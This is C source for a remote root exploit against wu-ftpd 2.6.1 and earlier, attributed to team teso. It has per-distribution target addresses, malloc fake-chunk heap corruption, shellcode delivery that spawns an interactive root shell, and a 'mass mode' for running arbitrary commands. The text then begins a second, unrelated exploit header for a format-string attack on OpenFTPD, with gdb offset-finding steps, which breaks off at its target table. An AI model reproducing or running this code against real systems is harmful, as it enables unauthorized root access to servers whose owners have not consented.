{ "RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]",
"Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x08070ddc, 0x08084600 },
{ "RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]",
"Version wu-2.6.1-16",
x86_wrx, sizeof (x86_wrx) - 1,
0x0807314c, 0x08085de0 },
{ "RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]",
"Version wu-2.6.1-18",
x86_wrx, sizeof (x86_wrx) - 1,
0x08072c30, 0x08085900 },
{ "SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]",
"Version wu-2.6.0(1) Wed Aug 30 22:26:16 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e6b4, 0x080800c0 },
{ "SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Wed Aug 30 22:26:37 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806989c, 0x08069f80 },
{ "SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]",
"Version wu-2.6.0(1) Thu Oct 28 23:35:06 GMT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f85c, 0x08081280 },
{ "SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]",
"Version wu-2.6.0(1) Mon Jun 26 13:11:34 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f4e0, 0x08080f00 },
{ "SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jun 26 13:11:56 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a234, 0x0806a880 },
{ "SuSE 7.0 [wuftpd.rpm]",
"Version wu-2.6.0(1) Wed Sep 20 23:52:03 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f180, 0x08080ba0 },
{ "SuSE 7.0 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Wed Sep 20 23:52:21 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a554, 0x0806aba0 },
{ "SuSE 7.1 [wuftpd.rpm]",
"Version wu-2.6.0(1) Thu Mar 1 14:43:47 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f168, 0x08080980 },
{ "SuSE 7.1 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Thu Mar 1 14:44:08 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a534, 0x0806ab80 },
{ "SuSE 7.2 [wuftpd.rpm]",
"Version wu-2.6.0(1) Mon Jun 18 12:34:55 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f58c, 0x08080dc0 },
{ "SuSE 7.2 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jun 18 12:35:12 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a784, 0x0806ae40 },
{ "SuSE 7.3 [wuftpd.rpm]",
"Version wu-2.6.0(1) Thu Oct 25 03:14:33 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f31c, 0x08080aa0 },
{ "SuSE 7.3 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Thu Oct 25 03:14:49 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a764, 0x0806ad60 },
#if 0
/* slackware (from 8 on they use proftpd by default) */
{ "Slackware 7",
"Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806d03c, 0x0808f648 },
#endif
{ "Slackware 7.1",
"Version wu-2.6.0(1) Tue Jun 27 10:52:28 PDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806ba2c, },
{ NULL, NULL, 0, 0, 0, 0 },
};
/* exploitation related stuff.
* DO NOT CHANGE, except you know exactly what you are doing.
*/
#define CHUNK_POS 256
#define MALLOC_ALIGN_MASK 0x07
#define MALLOC_MINSIZE 0x10
#define CHUNK_ALLSIZE(s) \
CHUNK_ROUND((s)) + 0x08
#define CHUNK_ROUND(s) \
(((((s) + 4 + MALLOC_ALIGN_MASK)) < \
(MALLOC_MINSIZE + MALLOC_ALIGN_MASK)) ? \
(MALLOC_MINSIZE) : ((((s) + 4 + MALLOC_ALIGN_MASK)) & \
~MALLOC_ALIGN_MASK))
/* minimum sized malloc(n) allocation that will jield in an overall
* chunk size of s. (s must be a valid %8=0 chunksize)
*/
#define CHUNK_ROUNDDOWN(s) \
((s) <= 0x8) ? (1) : ((s) - 0x04 - 11)
#define CHUNK_STRROUNDDOWN(s) \
(CHUNK_ROUNDDOWN ((s)) > 1 ? CHUNK_ROUNDDOWN ((s)) - 1 : 1)
/* FTP related stuff
*/
char * dest = "127.0.0.1"; /* can be changed with -d */
char * username = "ftp"; /* can be changed with -u */
char * password = "mozilla@"; /* can be changed with -p */
char * ftp_banner = NULL;
int verbose = 0;
/* FTP prototypes
*/
void ftp_escape (unsigned char *buf, unsigned long int buflen);
void ftp_recv_until (int sock, char *buff, int len, char *begin);
int ftp_login (char *host, char *user, char *pass);
/* main prototypes
*/
void usage (char *progname);
void exploit (int fd, tgt_type *tgt);
void shell (int sock);
void hexdump (char *desc, unsigned char *data, unsigned int amount);
void tgt_list (void);
tgt_type * tgt_frombanner (unsigned char *banner);
void xp_buildsize (int fd, unsigned char this_size_ls,
unsigned long int csize);
void xp_gapfill (int fd, int rnfr_num, int rnfr_size);
int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
/*** MASS mode stuff
*/
static int
sc_build_x86_lnx (unsigned char *target, size_t target_len,
unsigned char *shellcode, char **argv);
int mass = 0; /* enable with -m (kids, get hurt!) */
unsigned int mlen = 0;
unsigned char mcode[256];
/* imported from network.c
*/
#define NET_CONNTIMEOUT 60
#define NET_READTIMEOUT 20
int net_conntimeout = NET_CONNTIMEOUT;
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
void net_write (int fd, const char *str, ...);
int net_rtimeout (int fd, int sec);
int net_rlinet (int fd, char *buf, int bufsize, int sec);
/* exploitation related stuff, which is fixed on all wuftpd systems
*/
#define RNFR_SIZE 4
#define RNFR_NUM 73
int automode = 0; /* evil, do not use */
int debugmode = 0;
void
usage (char *progname)
{
fprintf (stderr, "usage: %s [-h] [-v] [-a] [-D] [-m]\n"
"\t[-t <num>] [-u <user>] [-p <pass>] [-d host]\n"
"\t[-L <retloc>] [-A <retaddr>]\n\n", progname);
fprintf (stderr,
"-h\tthis help\n"
"-v\tbe verbose (default: off, twice for greater effect)\n"
"-a\tAUTO mode (target from banner)\n"
"-D\tDEBUG mode (waits for keypresses)\n"
"-m\tenable mass mode (use with care)\n"
"-t num\tchoose target (0 for list, try -v or -v -v)\n"
"-u user\tusername to login to FTP (default: \"ftp\")\n"
"-p pass\tpassword to use (default: \"mozilla@\")\n"
"-d dest\tIP address or fqhn to connect to "
"(default: 127.0.0.1)\n"
"-L loc\toverride target-supplied retloc "
"(format: 0xdeadbeef)\n"
"-A addr\toverride target-supplied retaddr "
"(format: 0xcafebabe)\n");
fprintf (stderr, "\n");
exit (EXIT_FAILURE);
}
unsigned char * shellcode = NULL;
unsigned long int shellcode_len = 0;
unsigned long int user_retloc = 0,
user_retaddr = 0;
int
main (int argc, char *argv[])
{
char c;
char * progname; /* = argv[0] */
int fd;
tgt_type * tgt = NULL;
int tgt_num = -1;
unsigned char xpbuf[512 + 16];
fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
"(version "VERSION")\n"
"team teso (thx bnuts, tomas, synnergy.net !).\n\n");
progname = argv[0];
if (argc < 2)
usage (progname);
while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
switch (c) {
case 'h':
usage (progname);
break;
case 'a':
automode = 1;
break;
case 'D':
debugmode = 1;
break;
case 'v':
verbose += 1;
break;
case 'm':
mass = 1;
break;
case 't':
if (sscanf (optarg, "%u", &tgt_num) != 1)
usage (progname);
break;
case 'u':
username = "h0ra";
printf ("username = %s\n", optarg);
break;
case 'p':
password = optarg;
break;
case 'd':
dest = optarg;
break;
case 'L':
if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
usage (progname);
break;
case 'A':
if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
usage (progname);
break;
default:
usage (progname);
break;
}
}
/* if both required offsets are given manually, then we dont have
* to require a target selection. otherwise check whether the target
* is within the list. if its not, then print a list of available
* targets
*/
if (user_retloc != 0 && user_retaddr != 0) {
tgt = &tmanual;
} else if (automode == 0 && (tgt_num == 0 ||
tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
{
if (tgt_num != 0)
printf ("WARNING: target out of list. list:\n\n");
tgt_list ();
exit (EXIT_SUCCESS);
}
if (tgt == NULL && automode == 0)
tgt = &targets[tgt_num - 1];
if (mass == 1) {
if ((argc - optind) == 0)
usage (progname);
mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
x86_lnx_execve, &argv[optind]);
if (mlen >= 0xff) {
fprintf (stderr, "created argv-code too long "
"(%d bytes)\n", mlen);
exit (EXIT_FAILURE);
}
fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
}
printf ("# trying to log into %s with (%s/%s) ...", dest,
username, password);
fflush (stdout);
fd = ftp_login (dest, username, password);
if (fd <= 0) {
fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
exit (EXIT_FAILURE);
}
printf (" connected.\n");
if (debugmode) {
printf ("DEBUG: press enter\n");
getchar ();
}
printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
ftp_banner);
if (tgt == NULL && automode) {
tgt = tgt_frombanner (ftp_banner);
if (tgt == NULL) {
printf ("# failed to jield target from banner, aborting\n");
exit (EXIT_FAILURE);
}
printf ("# successfully selected target from banner\n");
}
if (shellcode == NULL) {
shellcode = tgt->shellcode;
shellcode_len = tgt->shellcode_len;
}
if (verbose >= 2) {
printf ("using %lu byte shellcode:\n", shellcode_len);
hexdump ("shellcode", shellcode, shellcode_len);
}
if (user_retaddr != 0) {
fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
user_retaddr);
}
if (user_retloc != 0) {
fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
user_retloc);
tgt->retloc = user_retloc;
}
printf ("\n### TARGET: %s\n\n", tgt->desc);
/* real stuff starts from here
*/
printf ("# 1. filling memory gaps\n");
xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
exploit (fd, tgt);
printf ("# 3. triggering free(globlist[1])\n");
net_write (fd, "CWD ~{\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
if (strncmp (xpbuf, "sP", 2) != 0) {
fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
xpbuf);
exit (EXIT_FAILURE);
}
printf ("#\n# exploitation succeeded. sending real shellcode\n");
if (mass == 1) {
printf ("# mass mode, sending constructed argv code\n");
write (fd, mcode, mlen);
printf ("# send. sleeping 10 seconds\n");
sleep (10);
printf ("# success.\n");
exit (EXIT_SUCCESS);
}
printf ("# sending setreuid/chroot/execve shellcode\n");
net_write (fd, "%s", x86_lnx_shell);
printf ("# spawning shell\n");
printf ("##################################################"
"##########################\n");
write (fd, INIT_CMD, strlen (INIT_CMD));
shell (fd);
exit (EXIT_SUCCESS);
}
void
exploit (int fd, tgt_type *tgt)
{
unsigned long int dir_chunk_size,
bridge_dist,
padchunk_size,
fakechunk_size,
pad_before;
unsigned char * dl; /* dirlength */
unsigned char xpbuf[512 + 64];
/* figure out home directory length
*/
net_write (fd, "PWD\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "257 ");
dl = strchr (xpbuf, '"');
if (dl == NULL || strchr (dl + 1, '"') == NULL) {
fprintf (stderr, "faulty PWD reply: %s\n", xpbuf);
exit (EXIT_FAILURE);
}
dir_chunk_size = 0;
for (dl += 1 ; *dl != '"' ; ++dl)
dir_chunk_size += 1;
if (verbose)
printf ("PWD path (%lu): %s\n", dir_chunk_size, xpbuf);
/* compute chunk size from it (needed later)
*/
dir_chunk_size += 3; /* ~/ + NUL byte */
dir_chunk_size = CHUNK_ROUND (dir_chunk_size);
if (debugmode)
printf ("dir_chunk_size = 0x%08lx\n", dir_chunk_size);
/* send preparation buffer to store the fakechunk in the end of
* the malloc buffer allocated from within the parser ($1)
*/
printf ("# 2. sending bigbuf + fakechunk\n");
xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
if (verbose)
hexdump ("xpbuf", xpbuf, strlen (xpbuf));
ftp_escape (xpbuf, sizeof (xpbuf));
net_write (fd, "CWD %s\n", xpbuf);
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
/* synnergy.net uberleet method (thank you very much guys !)
*/
net_write (fd, "CWD ~/{.,.,.,.}\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
/* now, we flush the last-used-chunk marker in glibc malloc code. else
* we might land in a previously used bigger chunk, but we need a
* sequential order. "CWD ." will allocate a two byte chunk, which will
* be reused on any later small malloc.
*/
net_write (fd, "CWD .\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
/* cause chunk with padding size
*/
pad_before = CHUNK_ALLSIZE (strlen ("~/{.,.,.,.}\n")) +
dir_chunk_size - 0x08;
xp_gapfill (fd, 1, CHUNK_ROUNDDOWN (pad_before));
/* 0x10 (CWD ~/{.,.,.,.}) + 4 * dirchunk */
bridge_dist = 0x10 + 4 * dir_chunk_size;
if (debugmode)
printf ("bridge_dist = 0x%08lx\n", bridge_dist);
/* 0x18 (RNFR 16), dcs (RNFR dir), 0x10 (CWD ~{) */
padchunk_size = bridge_dist - 0x18 - dir_chunk_size - 0x10;
if (debugmode)
printf ("padchunk_size = 0x%08lx\n", padchunk_size);
/* +4 = this_size field itself */
fakechunk_size = CHUNK_POS + 4;
fakechunk_size -= pad_before;
fakechunk_size += 0x04; /* account for prev_size, too */
fakechunk_size |= 0x1; /* set PREV_INUSE */
if (debugmode)
printf ("fakechunk_size = 0x%08lx\n", fakechunk_size);
xp_buildsize (fd, fakechunk_size, 0x10);
/* pad down to the minimum possible size in 8 byte alignment
*/
if (verbose)
printf ("\npadchunk_size = 0x%08lx\n==> %lu\n",
padchunk_size, padchunk_size - 8 - 1);
xp_gapfill (fd, 1, padchunk_size - 8 - 1);
if (debugmode) {
printf ("press enter\n");
getchar ();
}
return;
}
/* tgt_list
*
* give target list
*/
void
tgt_list (void)
{
int tgt_num;
printf ("num . description\n");
printf ("----+-----------------------------------------------"
"--------\n");
for (tgt_num = 0 ; targets[tgt_num].desc != NULL ; ++tgt_num) {
printf ("%3d | %s\n", tgt_num + 1, targets[tgt_num].desc);
if (verbose)
printf (" : %s\n", targets[tgt_num].banner);
if (verbose >= 2)
printf (" : retloc: 0x%08lx "
"cbuf: 0x%08lx\n",
targets[tgt_num].retloc,
targets[tgt_num].cbuf);
}
printf (" '\n");
return;
}
/* tgt_frombanner
*
* try to automatically select target from ftp banner
*
* return pointer to target structure on success
* return NULL on failure
*/
tgt_type *
tgt_frombanner (unsigned char *banner)
{
int tw; /* target list walker */
for (tw = 0 ; targets[tw].desc != NULL ; ++tw) {
if (strstr (banner, targets[tw].banner) != NULL)
return (&targets[tw]);
}
return (NULL);
}
/* xp_buildsize
*
* set chunksize to this_size_ls. do this in a csize bytes long chunk.
* normally csize = 0x10. csize is always a padded chunksize.
*/
void
xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize)
{
int n,
cw; /* chunk walker */
unsigned char tmpbuf[512];
unsigned char * leet = "7350";
for (n = 2 ; n > 0 ; --n) {
memset (tmpbuf, '\0', sizeof (tmpbuf));
for (cw = 0 ; cw < (csize - 0x08) ; ++cw)
tmpbuf[cw] = leet[cw % 4];
tmpbuf[cw - 4 + n] = '\0';
if (debugmode)
printf (": CWD %s\n", tmpbuf);
net_write (fd, "CWD %s\n", tmpbuf);
ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
}
memset (tmpbuf, '\0', sizeof (tmpbuf));
for (cw = 0 ; cw < (csize - 0x08 - 0x04) ; ++cw)
tmpbuf[cw] = leet[cw % 4];
if (debugmode)
printf ("| CWD %s\n", tmpbuf);
net_write (fd, "CWD %s%c\n", tmpbuf, this_size_ls);
ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
/* send a minimum-sized malloc request that will allocate a chunk
* with 'csize' overall bytes
*/
xp_gapfill (fd, 1, CHUNK_STRROUNDDOWN (csize));
return;
}
/* xp_gapfill
*
* fill all small memory gaps in wuftpd malloc space. do this by sending
* rnfr requests which cause a memleak in wuftpd.
*
* return in any case
*/
void
xp_gapfill (int fd, int rnfr_num, int rnfr_size)
{
int n;
unsigned char * rb; /* rnfr buffer */
unsigned char * rbw; /* rnfr buffer walker */
unsigned char rcv_buf[512]; /* temporary receive buffer */
if (debugmode)
printf ("RNFR: %d x 0x%08x (%d)\n",
rnfr_num, rnfr_size, rnfr_size);
rbw = rb = calloc (1, rnfr_size + 6);
strcpy (rbw, "RNFR ");
rbw += strlen (rbw);
/* append a string of "././././". since wuftpd only checks whether
* the pathname is lstat'able, it will go through without any problems
*/
for (n = 0 ; n < rnfr_size ; ++n)
strcat (rbw, ((n % 2) == 0) ? "." : "/");
strcat (rbw, "\n");
for (n = 0 ; n < rnfr_num; ++n) {
net_write (fd, "%s", rb);
ftp_recv_until (fd, rcv_buf, sizeof (rcv_buf), "350 ");
}
free (rb);
return;
}
#define ADDR_STORE(ptr,addr){\
((unsigned char *) (ptr))[0] = (addr) & 0xff;\
((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
}
int
xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
{
unsigned char * wl;
memset (buf, '\0', buf_len);
memset (buf, '0', CHUNK_POS);
xp_buildchunk (tgt, buf + CHUNK_POS, buf_len - CHUNK_POS - 1);
for (wl = buf + strlen (buf) ; wl < &buf[buf_len - 1] ; wl += 2) {
wl[0] = '\xeb';
wl[1] = '\x0c';
}
memcpy (&buf[buf_len - 1] - shellcode_len, shellcode,
shellcode_len);
return (strlen (buf));
}
/* xp_buildchunk
*
* build the fake malloc chunk that will overwrite retloc with retaddr
*/
void
xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
{
unsigned long int retaddr_eff; /* effective */
if (user_retaddr)
retaddr_eff = user_retaddr;
else
retaddr_eff = tgt->cbuf + 512 - shellcode_len - 16;
fprintf (stderr, "\tbuilding chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
tgt->retloc, retaddr_eff, clen);
/* easy, straight forward technique
*/
ADDR_STORE (&cspace[0], 0xfffffff0); /* prev_size */
ADDR_STORE (&cspace[4], 0xfffffffc); /* this_size */
ADDR_STORE (&cspace[8], tgt->retloc - 12); /* fd */
ADDR_STORE (&cspace[12], retaddr_eff); /* bk */
return;
}
void
shell (int sock)
{
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
perror ("read user");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("connection closed by foreign host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
perror ("read remote");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
/*** FTP functions
*/
/* FTP is TELNET is SHIT.
*/
void
ftp_escape (unsigned char *buf, unsigned long int buflen)
{
unsigned char * obuf = buf;
for ( ; *buf != '\0' ; ++buf) {
if (*buf == 0xff &&
(((buf - obuf) + strlen (buf) + 1) < buflen))
{
memmove (buf + 1, buf, strlen (buf) + 1);
buf += 1;
}
}
}
void
ftp_recv_until (int sock, char *buff, int len, char *begin)
{
char dbuff[2048];
if (buff == NULL) {
buff = dbuff;
len = sizeof (dbuff);
}
do {
memset (buff, '\x00', len);
if (net_rlinet (sock, buff, len - 1, 20) <= 0)
return;
} while (memcmp (buff, begin, strlen (begin)) != 0);
return;
}
int
ftp_login (char *host, char *user, char *pass)
{
int ftpsock;
char resp[512];
ftpsock = net_connect (NULL, host, 21, 30);
if (ftpsock <= 0)
return (0);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
/* handle multiline pre-login stuff (rfc violation !)
*/
if (memcmp (resp, "220-", 4) == 0)
ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
if (memcmp (resp, "220 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
ftp_banner = strdup (resp);
net_write (ftpsock, "USER %s\n", user);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
if (memcmp (resp, "331 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
net_write (ftpsock, "PASS %s\n", pass);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
/* handle multiline responses from ftp servers
*/
if (memcmp (resp, "230-", 4) == 0)
ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
if (memcmp (resp, "230 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
return (ftpsock);
flerr:
if (ftpsock > 0)
close (ftpsock);
return (0);
}
/* ripped from zodiac */
void
hexdump (char *desc, unsigned char *data, unsigned int amount)
{
unsigned int dp, p; /* data pointer */
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~................................. ..."
".................................................. ..."
"........................................";
printf ("/* %s, %u bytes */\n", desc, amount);
for (dp = 1; dp <= amount; dp++) {
fprintf (stderr, "%02x ", data[dp-1]);
if ((dp % 8) == 0)
fprintf (stderr, " ");
if ((dp % 16) == 0) {
fprintf (stderr, "| ");
p = dp;
for (dp -= 16; dp < p; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
fprintf (stderr, "\n");
}
fflush (stderr);
}
if ((amount % 16) != 0) {
p = dp = 16 - (amount % 16);
for (dp = p; dp > 0; dp--) {
fprintf (stderr, " ");
if (((dp % 8) == 0) && (p != 8))
fprintf (stderr, " ");
fflush (stderr);
}
fprintf (stderr, " | ");
for (dp = (amount - (16 - p)); dp < amount; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
}
fprintf (stderr, "\n");
return;
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n,
len,
error,
flags;
int fd;
struct timeval tv;
fd_set rset, wset;
struct sockaddr_in csa;
if (cs == NULL)
cs = &csa;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[1025];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
#ifdef DEBUG
printf ("[snd] %s%s", tmp, (tmp[strlen (tmp) - 1] == '\n') ? "" : "\n");
#endif
send(fd, tmp, i, 0);
return;
}
int
net_rlinet (int fd, char *buf, int bufsize, int sec)
{
int n;
unsigned long int rb = 0;
struct timeval tv_start, tv_cur;
memset(buf, '\0', bufsize);
(void) gettimeofday(&tv_start, NULL);
do {
(void) gettimeofday(&tv_cur, NULL);
if (sec > 0) {
if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
((tv_start.tv_sec * 1000000) +
(tv_start.tv_usec))) > (sec * 1000000))
{
return (-1);
}
}
n = net_rtimeout(fd, NET_READTIMEOUT);
if (n <= 0) {
return (-1);
}
n = read(fd, buf, 1);
if (n <= 0) {
return (n);
}
rb++;
if (*buf == '\n')
return (rb);
buf++;
if (rb >= bufsize)
return (-2); /* buffer full */
} while (1);
}
int
net_rtimeout (int fd, int sec)
{
fd_set rset;
struct timeval tv;
int n, error, flags;
error = 0;
flags = fcntl(fd, F_GETFL, 0);
n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1)
return (-1);
FD_ZERO(&rset);
FD_SET(fd, &rset);
tv.tv_sec = sec;
tv.tv_usec = 0;
/* now we wait until more data is received then the tcp low level
* watermark, which should be setted to 1 in this case (1 is default)
*/
n = select(fd + 1, &rset, NULL, NULL, &tv);
if (n == 0) {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1) {
return (-1);
}
/* socket readable ? */
if (FD_ISSET(fd, &rset)) {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (1);
} else {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
errno = ETIMEDOUT;
return (-1);
}
}
static int
sc_build_x86_lnx (unsigned char *target, size_t target_len,
unsigned char *shellcode, char **argv)
{
int i;
size_t tl_orig = target_len;
if (strlen (shellcode) >= (target_len - 1))
return (-1);
memcpy (target, shellcode, strlen (shellcode));
target += strlen (shellcode);
target_len -= strlen (shellcode);
for (i = 0 ; argv[i] != NULL ; ++i)
;
/* set argument count
*/
target[0] = (unsigned char) i;
target++;
target_len--;
for ( ; i > 0 ; ) {
i -= 1;
if (strlen (argv[i]) >= target_len)
return (-1);
printf ("[%3d/%3d] adding (%2d): %s\n",
(tl_orig - target_len), tl_orig,
strlen (argv[i]), argv[i]);
memcpy (target, argv[i], strlen (argv[i]));
target += strlen (argv[i]);
target_len -= strlen (argv[i]);
target[0] = (unsigned char) (i + 1);
target++;
target_len -= 1;
}
return (tl_orig - target_len);
}
// [2002-05-14]
21 OpenFTPD (<= 0.30.2) Remote Exploit
/************************************************** *********
* hoagie_openftpd.c
* LINUX/X86 OPENFTPD REMOTE EXLPOIT (<= 0.30.2)
*
* "
* Searching for those warez ftpd's out there and
* leeching 'free' movies
* "
*
* Remote Linux/OpenFTPD exploit for the format string bug
* in the message system. This vulnerability was rediscovered
* by a VOID.AT.
*
* HOWTO get the offsets
* andi@denkmal:~$ gdb ~/openftpd/bin/msg
* ...
*
* (gdb) x/i fgets
* 0x8048ae4 <fgets>: jmp *0x804db90
* ^^^^^^^^^
* the first one
* (gdb) break main
* Breakpoint 1 at 0x804bd05
* (gdb) r
* Starting program: /home/andi/openftpd/bin/msg
* [Thread debugging using libthread_db enabled]
* [New Thread 16384 (LWP 29479)]
* [Switching to Thread 16384 (LWP 29479)]
*
* Breakpoint 1, 0x0804bd05 in main ()
* (gdb) x/i system
* 0x40071c40 <system>: push %ebp
* ^^^^^^^^^^
* the second addresss
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* [email protected]
* http://www.void.at
*
************************************************** **********/
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
enum EXPLOITSTATE { SENDUSER, SENDPASS, DELMESSAGE, PURGEMESSAGE, SENDMESSAGE, READMESSAGE, READING };
struct target_t {
char *sys;
char *libc;
int fgetsgot;
int system;
};
struct target_t targets[] = {
